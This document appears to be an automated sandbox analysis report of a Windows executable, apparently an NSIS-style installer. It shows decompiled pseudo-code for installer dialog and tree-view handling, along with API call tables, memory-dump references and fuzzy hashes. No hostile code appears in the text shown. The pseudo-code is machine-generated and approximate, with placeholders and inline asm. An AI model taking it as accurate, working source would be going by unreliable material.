											E00404BDF(0x3ff, 0xfffffffb, E00404BF7(5));
										}
										goto L90;
									}
									_t322 = _t206 + 8;
									do {
										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t212 != 0) {
											_t300 =  *_t322;
											_v72 = _t212;
											_v76 = 8;
											if((_t300 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t322[4]);
												_t322[0] = _t322[0] & 0x000000fe;
											}
											if((_t300 & 0x00000040) == 0) {
												_t216 = (_t300 & 0x00000001) + 1;
												if((_t300 & 0x00000010) != 0) {
													_t216 = _t216 + 3;
												}
											} else {
												_t216 = 3;
											}
											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageA(_v8, 0x110d, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t322 =  &(_t322[0x106]);
									} while (_v24 <  *0x42f48c);
									goto L86;
								} else {
									_t323 = E004012E2( *0x42a8b0);
									E00401299(_t323);
									_t227 = 0;
									_t298 = 0;
									if(_t323 <= 0) {
										L74:
										SendMessageA(_v12, 0x14e, _t298, 0);
										_a16 = _t323;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
											_t298 = _t298 + 1;
										}
										_t227 = _t227 + 1;
									} while (_t227 < _t323);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t237 = SendMessageA(_v12, 0x147, 0, 0);
							if(_t237 == 0xffffffff) {
								goto L93;
							}
							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
								_t324 = 0x20;
							}
							E00401299(_t324);
							SendMessageA(_a4, 0x420, 0, _t324);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					 *0x42f4c0 = _a4;
					_v20 = 2;
					 *0x42a8b0 = GlobalAlloc(0x40,  *0x42f48c << 2);
					_t264 = LoadImageA( *0x42f440, 0x6e, 0, 0, 0, 0);
					 *0x42a8a4 =  *0x42a8a4 | 0xffffffff;
					_v16 = _t264;
					 *0x42a8ac = SetWindowLongA(_v8, 0xfffffffc, E004052E8);
					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
					 *0x42a89c = _t266;
					ImageList_AddMasked(_t266, _v16, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x42a89c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
						SendMessageA(_v8, 0x111b, _t320, 0);
					}
					DeleteObject(_v16);
					_t327 = 0;
					do {
						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
							if(_t327 != 0x20) {
								_v20 = 0;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E004062E0(0, _t327, _t331, 0, _t272)), _t327);
						}
						_t327 = _t327 + 1;
					} while (_t327 < 0x21);
					_t328 = _a16;
					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004042D1(_a4);
					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004042D1(_a4);
					_t329 = 0;
					_v16 = 0;
					if( *0x42f48c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t316 = _v24 + 8;
						_v32 = _t316;
						do {
							_t284 =  &(_t316[0x10]);
							if( *_t284 != 0) {
								_v64 = _t284;
								_t285 =  *_t316;
								_v88 = _v16;
								_t308 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t308;
								_v44 = _t329;
								_v72 = _t285 & _t308;
								if((_t285 & 0x00000002) == 0) {
									if((_t285 & 0x00000004) == 0) {
										 *( *0x42a8b0 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
									} else {
										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
									_v36 = 1;
									 *( *0x42a8b0 + _t329 * 4) = _t290;
									_v16 =  *( *0x42a8b0 + _t329 * 4);
								}
							}
							_t329 = _t329 + 1;
							_t316 =  &(_v32[0x418]);
							_v32 = _t316;
						} while (_t329 <  *0x42f48c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E00404306(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00404306(_v12);
								L93:
								return E00404338(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404cf4
0x00404cfc
0x00404d04
0x00404d0a
0x00404d22
0x00404d25
0x00404d26
0x00404f53
0x00404f5a
0x00404f6e
0x00404f5c
0x00404f5e
0x00404f61
0x00404f62
0x00404f69
0x00404f69
0x00404f7a
0x00404f88
0x00404f8b
0x00404fa1
0x00405016
0x00405019
0x0040501b
0x00405025
0x00405033
0x00405033
0x00405035
0x0040503f
0x00405045
0x00405048
0x0040504b
0x00405066
0x0040504d
0x00405057
0x00405057
0x0040504b
0x0040503f
0x00000000
0x00405019
0x00404fa6
0x00404fb1
0x00404fb6
0x00404fbd
0x00404fc2
0x00404fc6
0x00404fd1
0x00404fd1
0x00404fd5
0x00404fd9
0x00404fdd
0x00404ff0
0x00404fdf
0x00404fdf
0x00404fe6
0x00404fec
0x00404fe8
0x00404fe8
0x00404fe8
0x00404fe6
0x00404ff4
0x00404ff6
0x00405009
0x0040500c
0x0040500f
0x0040500f
0x00404fd9
0x00000000
0x00404fc6
0x00404fa8
0x00404faf
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405069
0x00405069
0x00405070
0x004050e1
0x004050e9
0x004050f1
0x004050f1
0x004050fa
0x004050fc
0x00405103
0x00405106
0x00405106
0x0040510c
0x00405113
0x00405116
0x00405116
0x0040511c
0x00405122
0x00405128
0x00405128
0x00405135
0x00405295
0x0040529c
0x004052b9
0x004052bf
0x004052d1
0x004052d1
0x00000000
0x0040513b
0x0040513d
0x00405142
0x00405147
0x0040514c
0x0040514e
0x0040514e
0x0040514f
0x00405150
0x00405152
0x00405152
0x0040515a
0x0040519b
0x0040519d
0x004051ad
0x004051b0
0x004051b5
0x004051bc
0x004051bf
0x00405261
0x00405269
0x00405271
0x00405271
0x00405277
0x0040527f
0x00405290
0x00405290
0x00000000
0x0040527f
0x004051c5
0x004051c8
0x004051ce
0x004051d3
0x004051d5
0x004051d7
0x004051dd
0x004051e4
0x004051e9
0x004051f0
0x004051f3
0x004051f3
0x004051fa
0x00405206
0x0040520a
0x0040520c
0x0040520c
0x004051fc
0x004051fe
0x004051fe
0x0040522c
0x00405238
0x00405247
0x00405247
0x00405249
0x0040524c
0x00405255
0x00000000
0x0040515c
0x00405167
0x0040516a
0x0040516f
0x00405171
0x00405175
0x00405185
0x0040518f
0x00405191
0x00405194
0x00000000
0x00000000
0x00000000
0x00000000
0x00405177
0x00405177
0x0040517d
0x0040517f
0x0040517f
0x00405180
0x00405181
0x00000000
0x00405177
0x0040515a
0x00405135
0x00405078
0x00000000
0x0040508e
0x00405098
0x0040509d
0x00000000
0x00000000
0x004050af
0x004050b4
0x004050c0
0x004050c0
0x004050c2
0x004050d1
0x004050d3
0x004050d7
0x004050da
0x00000000
0x004050da
0x00405078
0x00404d2c
0x00404d2f
0x00404d32
0x00404d42
0x00404d55
0x00404d60
0x00404d66
0x00404d74
0x00404d87
0x00404d8c
0x00404d97
0x00404da0
0x00404db6
0x00404dc6
0x00404dd2
0x00404dd2
0x00404dd7
0x00404ddd
0x00404ddf
0x00404de2
0x00404de7
0x00404dec
0x00404dee
0x00404dee
0x00404e0e
0x00404e0e
0x00404e10
0x00404e11
0x00404e16
0x00404e1c
0x00404e20
0x00404e25
0x00404e2d
0x00404e31
0x00404e36
0x00404e3b
0x00404e43
0x00404e46
0x00404f15
0x00404f28
0x00000000
0x00404e4c
0x00404e4f
0x00404e52
0x00404e55
0x00404e55
0x00404e5a
0x00404e63
0x00404e66
0x00404e6a
0x00404e6d
0x00404e70
0x00404e79
0x00404e82
0x00404e85
0x00404e88
0x00404e8b
0x00404ec9
0x00404ef4
0x00404ecb
0x00404eda
0x00404eda
0x00404e8d
0x00404e90
0x00404e9e
0x00404ea8
0x00404eb0
0x00404eb7
0x00404ec2
0x00404ec2
0x00404e8b
0x00404efa
0x00404efb
0x00404f07
0x00404f07
0x00404f13
0x00404f2e
0x00404f31
0x00404f4e
0x00000000
0x00404f33
0x00404f38
0x00404f41
0x004052d3
0x004052e5
0x004052e5
0x00404f31
0x00000000
0x00404f13
0x00404e46

APIs

GetDlgItem.USER32 ref: 00404CED
GetDlgItem.USER32 ref: 00404CFA
GlobalAlloc.KERNEL32(00000040,?), ref: 00404D49
LoadImageA.USER32 ref: 00404D60
SetWindowLongA.USER32 ref: 00404D7A
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D8C
ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DA0
SendMessageA.USER32(?,00001109,00000002), ref: 00404DB6
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404DC2
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404DD2
DeleteObject.GDI32(00000110), ref: 00404DD7
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404E02
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404E0E
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404EA8
SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404ED8

Part of subcall function 00404306: SendMessageA.USER32(00000028,?,00000001,00404136), ref: 00404314

SendMessageA.USER32(?,00001100,00000000,?), ref: 00404EEC
GetWindowLongA.USER32 ref: 00404F1A
SetWindowLongA.USER32 ref: 00404F28
ShowWindow.USER32(?,00000005), ref: 00404F38
SendMessageA.USER32(?,00000419,00000000,?), ref: 00405033
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00405098
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 004050AD
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 004050D1
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 004050F1
ImageList_Destroy.COMCTL32(?), ref: 00405106
GlobalFree.KERNEL32 ref: 00405116
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 0040518F
SendMessageA.USER32(?,00001102,?,?), ref: 00405238
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00405247
InvalidateRect.USER32(?,00000000,00000001), ref: 00405271
ShowWindow.USER32(?,00000000), ref: 004052BF
GetDlgItem.USER32 ref: 004052CA
ShowWindow.USER32(00000000), ref: 004052D1

Strings

M, xrefs: 00404E90
, xrefs: 004052A9
N, xrefs: 00404F71

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 522b9aef29dd3697019702309650a8f995276aa537964cdbeefa37b65f42cde9
Instruction ID: 815a2de4fdf1bcdeb3ef1062daa1c2d9177896ce2fe1d13919dbb69bdfef4a57
Opcode Fuzzy Hash: 522b9aef29dd3697019702309650a8f995276aa537964cdbeefa37b65f42cde9
Instruction Fuzzy Hash: 21027BB0A00209AFDB20DF94DD45AAE7BB5FB44314F50817AF610BA2E0C7799E52CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00403DFD, Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00403DFD(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t68;
				struct HWND__* _t74;
				signed int _t87;
				struct HWND__* _t92;
				signed int _t100;
				int _t104;
				signed int _t116;
				signed int _t117;
				int _t118;
				signed int _t123;
				struct HWND__* _t126;
				struct HWND__* _t127;
				int _t128;
				long _t131;
				int _t133;
				int _t134;
				void* _t135;
				void* _t143;

				_t116 = _a8;
				if(_t116 == 0x110 || _t116 == 0x408) {
					_t35 = _a12;
					_t126 = _a4;
					__eflags = _t116 - 0x110;
					 *0x42a8a0 = _t35;
					if(_t116 == 0x110) {
						 *0x42f448 = _t126;
						 *0x42a8b4 = GetDlgItem(_t126, 1);
						_t92 = GetDlgItem(_t126, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x429880 = _t92;
						E004042D1(_t126);
						SetClassLongA(_t126, 0xfffffff2,  *0x42ec28);
						 *0x42ec0c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42a8a0 = 1;
					}
					_t123 =  *0x40a1f8; // 0xffffffff
					_t134 = 0;
					_t131 = (_t123 << 6) +  *0x42f480;
					__eflags = _t123;
					if(_t123 < 0) {
						L34:
						E0040431D(0x40b);
						while(1) {
							_t37 =  *0x42a8a0;
							 *0x40a1f8 =  *0x40a1f8 + _t37;
							_t131 = _t131 + (_t37 << 6);
							_t39 =  *0x40a1f8; // 0xffffffff
							__eflags = _t39 -  *0x42f484;
							if(_t39 ==  *0x42f484) {
								E0040140B(1);
							}
							__eflags =  *0x42ec0c - _t134; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a1f8 -  *0x42f484; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t131 + 0x14);
							E004062E0(_t117, _t126, _t131, 0x437800,  *((intOrPtr*)(_t131 + 0x24)));
							_push( *((intOrPtr*)(_t131 + 0x20)));
							_push(0xfffffc19);
							E004042D1(_t126);
							_push( *((intOrPtr*)(_t131 + 0x1c)));
							_push(0xfffffc1b);
							E004042D1(_t126);
							_push( *((intOrPtr*)(_t131 + 0x28)));
							_push(0xfffffc1a);
							E004042D1(_t126);
							_t49 = GetDlgItem(_t126, 3);
							__eflags =  *0x42f4ec - _t134;
							_v32 = _t49;
							if( *0x42f4ec != _t134) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t49, _t117 & 0x00000008);
							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
							E004042F3(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x429880, _t118);
							__eflags = _t118 - _t134;
							if(_t118 == _t134) {
								_push(1);
							} else {
								_push(_t134);
							}
							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
							__eflags =  *0x42f4ec - _t134;
							if( *0x42f4ec == _t134) {
								_push( *0x42a8b4);
							} else {
								SendMessageA(_t126, 0x401, 2, _t134);
								_push( *0x429880);
							}
							E00404306();
							E0040624D(0x42a8b8, E00403DDE());
							E004062E0(0x42a8b8, _t126, _t131,  &(0x42a8b8[lstrlenA(0x42a8b8)]),  *((intOrPtr*)(_t131 + 0x18)));
							SetWindowTextA(_t126, 0x42a8b8);
							_push(_t134);
							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)));
							__eflags = _t68;
							if(_t68 != 0) {
								continue;
							} else {
								__eflags =  *_t131 - _t134;
								if( *_t131 == _t134) {
									continue;
								}
								__eflags =  *(_t131 + 4) - 5;
								if( *(_t131 + 4) != 5) {
									DestroyWindow( *0x42ec18);
									 *0x42a090 = _t131;
									__eflags =  *_t131 - _t134;
									if( *_t131 <= _t134) {
										goto L58;
									}
									_t74 = CreateDialogParamA( *0x42f440,  *_t131 +  *0x42ec20 & 0x0000ffff, _t126,  *(0x40a1fc +  *(_t131 + 4) * 4), _t131);
									__eflags = _t74 - _t134;
									 *0x42ec18 = _t74;
									if(_t74 == _t134) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t131 + 0x2c)));
									_push(6);
									E004042D1(_t74);
									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
									ScreenToClient(_t126, _t135 + 0x10);
									SetWindowPos( *0x42ec18, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
									_push(_t134);
									E00401389( *((intOrPtr*)(_t131 + 0xc)));
									__eflags =  *0x42ec0c - _t134; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x42ec18, 8);
									E0040431D(0x405);
									goto L58;
								}
								__eflags =  *0x42f4ec - _t134;
								if( *0x42f4ec != _t134) {
									goto L61;
								}
								__eflags =  *0x42f4e0 - _t134;
								if( *0x42f4e0 != _t134) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42ec18);
						 *0x42f448 = _t134;
						EndDialog(_t126,  *0x429c88);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t131 - _t134;
							if( *_t131 == _t134) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
						__eflags = _t87;
						if(_t87 == 0) {
							goto L33;
						}
						SendMessageA( *0x42ec18, 0x40f, 0, 1);
						__eflags =  *0x42ec0c - _t134; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t126 = _a4;
					_t134 = 0;
					if(_t116 == 0x47) {
						SetWindowPos( *0x42a898, _t126, 0, 0, 0, 0, 0x13);
					}
					if(_t116 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42a898,  ~(_a12 - 1) & _t116);
					}
					if(_t116 != 0x40d) {
						__eflags = _t116 - 0x11;
						if(_t116 != 0x11) {
							__eflags = _t116 - 0x111;
							if(_t116 != 0x111) {
								L26:
								return E00404338(_t116, _a12, _a16);
							}
							_t133 = _a12 & 0x0000ffff;
							_t127 = GetDlgItem(_t126, _t133);
							__eflags = _t127 - _t134;
							if(_t127 == _t134) {
								L13:
								__eflags = _t133 - 1;
								if(_t133 != 1) {
									__eflags = _t133 - 3;
									if(_t133 != 3) {
										_t128 = 2;
										__eflags = _t133 - _t128;
										if(_t133 != _t128) {
											L25:
											SendMessageA( *0x42ec18, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42f4ec - _t134;
										if( *0x42f4ec == _t134) {
											_t100 = E0040140B(3);
											__eflags = _t100;
											if(_t100 != 0) {
												goto L26;
											}
											 *0x429c88 = 1;
											L21:
											_push(0x78);
											L22:
											E004042AA();
											goto L26;
										}
										E0040140B(_t128);
										 *0x429c88 = _t128;
										goto L21;
									}
									__eflags =  *0x40a1f8 - _t134; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t133);
								goto L22;
							}
							SendMessageA(_t127, 0xf3, _t134, _t134);
							_t104 = IsWindowEnabled(_t127);
							__eflags = _t104;
							if(_t104 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t126, _t134, _t134);
						return 1;
					} else {
						DestroyWindow( *0x42ec18);
						 *0x42ec18 = _a12;
						L58:
						if( *0x42b8b8 == _t134) {
							_t143 =  *0x42ec18 - _t134; // 0x0
							if(_t143 != 0) {
								ShowWindow(_t126, 0xa);
								 *0x42b8b8 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}

0x00403e06
0x00403e0f
0x00403f50
0x00403f54
0x00403f58
0x00403f5a
0x00403f5f
0x00403f6a
0x00403f75
0x00403f7a
0x00403f7c
0x00403f7e
0x00403f81
0x00403f86
0x00403f94
0x00403fa1
0x00403fa8
0x00403fa8
0x00403fa9
0x00403fa9
0x00403fae
0x00403fb4
0x00403fbb
0x00403fc1
0x00403fc3
0x00404003
0x00404008
0x0040400d
0x0040400d
0x00404012
0x0040401b
0x0040401d
0x00404022
0x00404028
0x0040402c
0x0040402c
0x00404031
0x00404037
0x00000000
0x00000000
0x00404042
0x00404048
0x00000000
0x00000000
0x00404051
0x00404059
0x0040405e
0x00404061
0x00404067
0x0040406c
0x0040406f
0x00404075
0x0040407a
0x0040407d
0x00404083
0x0040408b
0x00404091
0x00404097
0x0040409b
0x004040a2
0x004040a2
0x004040a2
0x004040ac
0x004040be
0x004040ca
0x004040cf
0x004040d9
0x004040df
0x004040e1
0x004040e6
0x004040e3
0x004040e3
0x004040e3
0x004040f6
0x0040410e
0x00404110
0x00404116
0x0040412b
0x00404118
0x00404121
0x00404123
0x00404123
0x00404131
0x00404142
0x00404153
0x0040415a
0x00404160
0x00404164
0x00404169
0x0040416b
0x00000000
0x00404171
0x00404171
0x00404173
0x00000000
0x00000000
0x00404179
0x0040417d
0x004041a2
0x004041a8
0x004041ae
0x004041b0
0x00000000
0x00000000
0x004041d6
0x004041dc
0x004041de
0x004041e3
0x00000000
0x00000000
0x004041e9
0x004041ec
0x004041ef
0x00404206
0x00404212
0x0040422b
0x00404231
0x00404235
0x0040423a
0x00404240
0x00000000
0x00000000
0x0040424a
0x00404255
0x00000000
0x00404255
0x0040417f
0x00404185
0x00000000
0x00000000
0x0040418b
0x00404191
0x00000000
0x00000000
0x00000000
0x00404197
0x0040416b
0x00404262
0x0040426e
0x00404275
0x00000000
0x00403fc5
0x00403fc5
0x00403fc8
0x00403ffb
0x00403ffb
0x00403ffd
0x00000000
0x00000000
0x00000000
0x00403ffd
0x00403fca
0x00403fce
0x00403fd3
0x00403fd5
0x00000000
0x00000000
0x00403fe5
0x00403fed
0x00000000
0x00403ff3
0x00403e21
0x00403e21
0x00403e25
0x00403e2a
0x00403e39
0x00403e39
0x00403e42
0x00403e4b
0x00403e56
0x00403e56
0x00403e62
0x00403e7e
0x00403e81
0x00403e94
0x00403e9a
0x00403f3d
0x00000000
0x00403f46
0x00403ea0
0x00403ead
0x00403eaf
0x00403eb1
0x00403ed0
0x00403ed0
0x00403ed3
0x00403ed8
0x00403edb
0x00403eeb
0x00403eec
0x00403eee
0x00403f24
0x00403f37
0x00000000
0x00403f37
0x00403ef0
0x00403ef6
0x00403f0f
0x00403f14
0x00403f16
0x00000000
0x00000000
0x00403f18
0x00403f04
0x00403f04
0x00403f06
0x00403f06
0x00000000
0x00403f06
0x00403ef9
0x00403efe
0x00000000
0x00403efe
0x00403edd
0x00403ee3
0x00000000
0x00000000
0x00403ee5
0x00000000
0x00403ee5
0x00403ed5
0x00000000
0x00403ed5
0x00403ebb
0x00403ec2
0x00403ec8
0x00403eca
0x00000000
0x00000000
0x00000000
0x00403eca
0x00403e86
0x00000000
0x00403e64
0x00403e6a
0x00403e74
0x0040427b
0x00404281
0x00404283
0x00404289
0x0040428e
0x00404294
0x00404294
0x00404289
0x0040429e
0x00000000
0x0040429e
0x00403e62

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E39
ShowWindow.USER32(?), ref: 00403E56
DestroyWindow.USER32 ref: 00403E6A
SetWindowLongA.USER32 ref: 00403E86
GetDlgItem.USER32 ref: 00403EA7
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403EBB
IsWindowEnabled.USER32(00000000), ref: 00403EC2
GetDlgItem.USER32 ref: 00403F70
GetDlgItem.USER32 ref: 00403F7A
SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403F94
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403FE5
GetDlgItem.USER32 ref: 0040408B
ShowWindow.USER32(00000000,?), ref: 004040AC
EnableWindow.USER32(?,?), ref: 004040BE
EnableWindow.USER32(?,?), ref: 004040D9
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004040EF
EnableMenuItem.USER32 ref: 004040F6
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 0040410E
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00404121
lstrlenA.KERNEL32(0042A8B8,?,0042A8B8,00000000), ref: 0040414B
SetWindowTextA.USER32(?,0042A8B8), ref: 0040415A
ShowWindow.USER32(?,0000000A), ref: 0040428E

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: 0747cf473462c633210311af9825ea032a0e3c09bf9efde6129466eabca98a82
Instruction ID: d5b7a152eccfdaa35e4c53a1a76e60acfbe2d5449824965e5503988bb7e30882
Opcode Fuzzy Hash: 0747cf473462c633210311af9825ea032a0e3c09bf9efde6129466eabca98a82
Instruction Fuzzy Hash: 34C1E671604204ABDB216F62EE85E2B3BB8FB85349F40053EF641B51F0CB795892DB2D

Uniqueness

Uniqueness Score: -1.00%

Function 0040443C, Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040443C(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x429884 =  *0x429884 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00404338(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x42e3e0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_push(1);
								_t40 =  &_v8; // 0x42e3e0
								E004046E0(_a4,  *_t40);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42f448, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42f448, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x429884 != 0) {
						goto L25;
					} else {
						_t112 =  *0x42a090 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004042F3(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004046BC();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42ec1c; // 0x4bcdc2
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x42f498;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00404407;
				E004042D1(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E004042D1(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004042F3( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00404306(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
